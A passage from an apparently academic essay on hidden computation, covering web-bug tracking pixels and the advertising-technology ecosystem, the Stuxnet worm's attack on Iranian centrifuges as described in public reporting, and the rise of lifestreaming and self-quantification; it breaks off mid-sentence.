&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code run in the browser without the knowledge of the user, which if it should be observed, looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999):&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;(http://ad.doubleclick.net/ad/pixel.quicken/NEW)&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;(http://media.preferences.com/ping?&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any) &amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;group=register&amp;amp;amp; time=1999.10.27.20.5 6.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique to reduce the readability of the code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again Ghostery (2012b) usefully supplies us with some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)', the data is not shared with third parties but no information is given on their data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second guess, tempt, direct and nudge behavior in particular directions (see Parry, 2011). Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen in terms of relative size of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor to each website at [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) is generating $189 per user, at [http://www.businessinsider.com/blackboard/google Google] (search) it is generating $24 per user, and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow, 2011).&amp;amp;nbsp; Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is increasingly becomong extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into five main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers. (web site operators) Example: [http://www.burstmedia.com/ Burst Media] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are serviced through this data. Example: Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2012)]] ''Image 1: Display Advertising Technology Landscape (Luma, 2012)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs perform part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto and later confirmed in testimony to a U.S. House of Representatives subcommittee that it's ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation and keeps itself very much to itself in order to avoid raising too much unwarranted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the &amp;quot;do not track&amp;quot; header and there is currently no legal requirement that they do so in the US, or elsewhere (W3C, 2012). Although one can see in this context the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012).&amp;amp;nbsp; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; One of the newer, and perhaps indicative directions of travel of these new web bugs under development is called [http://www.persianstat.ir/ PersianStat], which claims to keep 'an eye on 1091622 websites': an Iranian web tracking and data analytics website, it shows that this new code ecology is not purely a Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in use of these tracker technologies. Pew (2012) found:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would 'not be okay' with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be 'okay' with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them. (Garber, 2012; Pew, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent&amp;amp;nbsp;to which users are just not aware of the subterranean depths of their computational devices and the ability&amp;amp;nbsp;of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). An issue helpfully illustrated by the next case study of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function.&amp;lt;br&amp;gt;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Stuxnet[6] is a computer worm which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. The name, ‘Stuxnet,’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’, the first part, 'stu', comes from the (.stub) file, mrxcls.sys; the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, like a test facility to model a nuclear plant, to create and launch it (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The Stuxnet worm works by undertaking a very complex stealth infection and covers its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise that it is actually gently causing the centifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals so an infected system does not exhibit abnormal behavior and therefore raise alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotaged effort, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010).&amp;amp;nbsp;A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Assocated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June, 2012, and hence hide its tracks. As Zetter explains:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is 'very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically',… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is intriguing because it is not a general purpose attack, but designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Indeed, there has been a great deal of speculation about whether a state would have been required to develop it due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexities and structure of the worm are such that at least thirty people would have been working on it simultaneously in order to build a worm of this kind (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, using a set of techniques that are not public nor known by the developer of the attacked system, in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach to its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLCs (Programmable Logic Controllers) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The two chief capabilities of Stuxnet are: (1) to identify its target precisely using a number of software based markers that give the physical identity of the location away. Indeed, ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b); and (2) the capability to disengage control systems from physical systems and to provide a stealth infection into the computer system that would fool the operators of the plant (also known as a ‘man-in-the-middle attack’). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, 315, was designed to slowly reduce the speed of rotors leading to cracks and failures, and the second larger warhead, 417, manipulated valves in the centrifuge and faking industrial process control sensor signals by modeling the centifuges which were grouped into 164 cascades (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards:[8]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a)&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The origin of the name Stuxnet is hypothesized from an analysis of the approximately 15,000 lines of programming code. The analysis performed by Langner (2011) and others, was a close reading and reconstruction of the programming logic by taking the machine code, disassembling it and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what the code was doing (Langner, 2011). Indeed, as part of this process a reference to 'Myrtus' was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus (see Sanger, 2012). Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see table 1).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;amp;nbsp;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
  [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
**Uzbekistan-&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized at targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But, of course, once the code for undertaking this kind of sophisticated cyberattack is out in the open it is relatively trivial to decode the computer code and learn techniques that would have taken many years of development in a very short time. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit with purposes linked to the collection of the data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the 'Tilded' [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The increased ability of software and code via computational devices to covertly monitor, control and mediate, both positively and negatively, is not just a case of interventions for deceiving the human and non-human actors that make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems as part of the notion of lifestreams, and more particularly the quantified self movement.&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Lastly, I want to connect these developments in web-bugs and worms with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have expanded in recent years as the ‘real-time streams’ platforms have expanded, like Twitter and Facebook. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re&amp;amp;nbsp;with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', who argue that the:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as 'self-tracking', 'body hacking' or 'self-quantifying'. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This phenomena of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. This closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations who wish to use this biodata for data mining and innovation surfacing. For example:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband]... has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Lifestreams were originally an idea from David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), which they described as:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents -- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and 'compress' large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Gelernter originally described these ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions related to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving the innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates, epitomized by Twitter, which has short text-message sized 140 character updates. Nonetheless this is still enough text space to incorporate a surprising amount of data, particularly when geo, image, weblinks, and so forth are factored in. Stephen Wolfram was one of the first people to collect their data systematically.&amp;amp;nbsp;As he explains, Wolfram started in 1989: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that.&amp;amp;nbsp;Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &amp;amp;nbsp;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; This kind of self-collection of data is certainly becoming more prevalent and in the context of reflexivity and self-knowledge, it raises interesting questions about the increasing use of mathematics and computation to understand and control the self. The scale of data that is collected can also be relatively large and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to 